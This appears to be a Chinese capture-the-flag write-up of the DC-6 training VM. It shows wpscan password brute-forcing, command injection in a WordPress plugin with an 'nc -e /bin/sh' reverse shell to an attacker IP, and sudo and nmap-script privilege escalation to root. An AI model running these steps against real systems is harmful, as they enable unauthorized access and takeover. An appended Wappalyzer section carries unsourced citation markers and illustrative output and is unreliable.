DC-6靶机

信息收集

靶机扫描

nmap 192.168.93.0/24

端口扫描,根据80端口的信息,发现我们并不能直接访问靶机的web页面,和/wordy相关

nmap -A 192.168.93.163 -p-

工具信息应该是要加入到hosts文件里,进行加入

进行页面访问

进行目录扫描

进行拼接访问目录/wp-admin

WPScan是一款强大的WordPress安全扫描工具

使用WPscan扫描网站包含的用户名

wpscan --url http://wordy -e u  

得到admin,mark,graham,sarah,jens几个用户名

根据靶机线索给予的代码,可以得到一个密码字典,这个字典在kali里面是有的,将文件输出到当前目录的passwords.txt

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

使用WPscan工具利用密码字典pssswords.txt去扫描网站

wpscan --url http://wordy --passwords passwords.txt

得到用户名mark和密码helpdesk01

进行登录,登陆成功

有个Activity monitor插件,在插件的tools选项中

在ID or integer的输入框中输入东西,然后点击Lookup,发现有回显

获取shell

尝试一下命令执行

baidu.com | ls

用bp抓包一下,在bp中输入baidu.com | nc -e /bin/sh 192.168.93.130 7878进行反弹shell,同时在kali中监听7878端口

发现成功获取shell,用python开启一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

进入/home目录,分别进入各个用户目录下查看存在什么可利用的文件

发现目录下面是几个用户文件,进去查看,在mark用户中,发现独有的stuff文件,查看文件内容

从thing-to-do.txt文件中我们得到graham用户的密码GSo7isUM1D4

利用用户graham和密码GSo7isUM1D4连接靶机的ssh服务

ssh graham@192.168.93.163

提权

进行sudo -l

发现可操作/home/jens/backups.sh,且执行时以jens用户身份执行

向脚本中写入/bin/bash命令,然后让jens用户来执行

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

成功切换为jens用户

再次进行sudo -l

发现nmap命令执行时以root身份执行,需要nmap打开一个shell即可获得root权限,尝试编写提权脚本

先进入jens用户目录,编写并执行脚本

cd /home/jens

echo "os.execute('/bin/bash')">demon.nse
//nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)
sudo nmap --script=demon.nse
//执行此脚本

成功获取root权限(这个shell不会显示打的命令,但是不影响输入)

查看/root目录,找到theflag.txt,

### Wapplyzer 工具的使用与下载 Wapplyzer 是一个用于识别 Web 应用程序技术栈的工具,可以快速检测出目标站点使用的 CMS、编程语言、框架以及其他相关信息。以下是关于 Wapplyzer 的下载和使用方法: #### 下载方式 Wapplyzer 工具通常作为浏览器插件提供,用户可以直接从浏览器的扩展商店下载并安装。以下是具体步骤: - 对于 **Chrome** 浏览器,访问 [Chrome Web Store](https://chrome.google.com/webstore/) 并搜索 Wappalyzer[^1]。 - 对于 **Firefox** 浏览器,访问 [Mozilla Add-ons](https://addons.mozilla.org/) 并搜索 Wappalyzer[^2]。 此外,Wapplyzer 还提供命令行版本(CLI),可以通过以下命令安装: ```bash npm install -g wappalyzer ``` 确保系统中已安装 Node.js 和 npm,否则需要先进行安装。 #### 在 DC-6 靶机端口 80 上的测试 在 DC-6 靶机中,端口 80 提供了一个基于 WordPress 的网站服务。使用 Wapplyzer 可以帮助识别该网站的技术栈,包括 CMS 版本、编程语言、Web 服务器类型等。以下是操作步骤: 1. **启动靶机并扫描 IP 地址** 使用 `nmap` 扫描靶机的开放端口,确认端口 80 是否开放: ```bash nmap -sS <靶机IP> ``` 确保端口 80 正常运行并提供 Web 服务[^3]。 2. **使用 Wapplyzer 分析网站** 如果使用浏览器插件版 Wapplyzer,直接访问靶机的 Web 服务地址(例如 `http://<靶机IP>`),插件会自动分析并显示结果。 如果使用 CLI 版本,执行以下命令: ```bash wappalyzer http://<靶机IP> ``` 输出将包含目标站点的技术信息,例如: ``` WordPress: 5.1.1 PHP: 7.2 Apache: 2.4 MySQL: 5.7 ``` 通过上述步骤,可以快速获取 DC-6 靶机端口 80 的技术细节,为后续渗透测试提供基础信息。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值